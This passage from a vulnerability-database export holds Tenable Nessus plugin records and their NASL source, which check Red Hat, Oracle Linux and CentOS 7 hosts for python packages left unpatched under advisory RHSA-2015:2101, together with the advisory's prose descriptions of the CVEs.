following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2101\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1752\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-1753\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-4650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-7185\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2101\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-debuginfo-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"python-libs-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-debuginfo / python-devel / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:50:14", "description": "From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-11-24T00:00:00", "title": "Oracle Linux 7 : python (ELSA-2015-2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-11-24T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:tkinter", "p-cpe:/a:oracle:linux:python", "p-cpe:/a:oracle:linux:python-libs", "p-cpe:/a:oracle:linux:python-test", "p-cpe:/a:oracle:linux:python-tools", "p-cpe:/a:oracle:linux:python-devel", "cpe:/o:oracle:linux:7", "p-cpe:/a:oracle:linux:python-debug"], "id": "ORACLELINUX_ELSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87020", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# Oracle Linux Security Advisory ELSA-2015-2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87020);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"Oracle Linux 7 : python (ELSA-2015-2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:2101 :\n\nUpdated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-November/005559.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:python-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:tkinter\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-debug-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-devel-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-libs-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-test-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"python-tools-2.7.5-34.0.1.el7\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"tkinter-2.7.5-34.0.1.el7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python / python-debug / python-devel / python-libs / python-test / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T09:30:23", "description": "Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-12-02T00:00:00", "title": "CentOS 7 : python (CESA-2015:2101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "modified": "2015-12-02T00:00:00", "cpe": ["p-cpe:/a:centos:centos:tkinter", "p-cpe:/a:centos:centos:python-devel", "p-cpe:/a:centos:centos:python", "p-cpe:/a:centos:centos:python-debug", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:python-test", "p-cpe:/a:centos:centos:python-libs", "p-cpe:/a:centos:centos:python-tools"], "id": "CENTOS_RHSA-2015-2101.NASL", "href": "https://www.tenable.com/plugins/nessus/87129", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2101 and \n# CentOS Errata and Security Advisory 2015:2101 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87129);\n script_version(\"2.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_xref(name:\"RHSA\", value:\"2015:2101\");\n\n script_name(english:\"CentOS 7 : python (CESA-2015:2101)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python packages that fix multiple security issues, several\nbugs, and add various enhancements are now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage often compared to Tcl, Perl, Scheme, or Java. Python includes\nmodules, classes, exceptions, very high level dynamic data types and\ndynamic typing. Python supports interfaces to many system calls and\nlibraries, as well as to various windowing systems (X11, Motif, Tk,\nMac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict\nthe size of gzip-compressed HTTP responses. A malicious XMLRPC server\ncould cause an XMLRPC client using xmlrpclib to consume an excessive\namount of memory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause\na client using one of the affected modules to consume an excessive\namount of memory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled\nURL encoded paths. A remote attacker could use this flaw to execute\nscripts outside of the cgi-bin directory, or disclose the source code\nof the scripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function\nhandled its offset and size arguments. An attacker able to control\nthese arguments could use this flaw to disclose portions of the\napplication memory or cause it to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An\nattacker able to control the index value passed to one of the affected\nfunctions could possibly use this flaw to disclose portions of the\napplication memory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or\nurllib) did not perform verification of TLS/SSL certificates when\nconnecting to HTTPS servers. A man-in-the-middle attacker could use\nthis flaw to hijack connections and eavesdrop or modify transferred\ndata. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to\nenable certificate verification by default. However, for backwards\ncompatibility, verification remains disabled by default. Future\nupdates may change this default. Refer to the Knowledgebase article\n2039753 linked to in the References section for further details about\nthis change. (BZ#1219108)\n\nThis update also fixes the following bugs :\n\n* Subprocesses used with the Eventlet library or regular threads\npreviously tried to close epoll file descriptors twice, which led to\nan 'Invalid argument' error. Subprocesses have been fixed to close the\nfile descriptors only once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no\nlonger produces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the\n'-s' option supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts 'None' as a keyfile\nargument. (BZ#1250611)\n\nIn addition, this update adds the following enhancements :\n\n* Security enhancements as described in PEP 466 have been backported\nto the Python standard library, for example, new features of the ssl\nmodule: Server Name Indication (SNI) support, support for new TLSv1.x\nprotocols, new hash algorithms in the hashlib module, and many more.\n(BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the\nssl library. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access\ninformation about the version of the SSL protocol used in a\nconnection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues and add these\nenhancements.\"\n );\n # https://lists.centos.org/pipermail/centos-cr-announce/2015-November/002560.html\n script_set_attribute(\n attribute:\"see_also\",\n 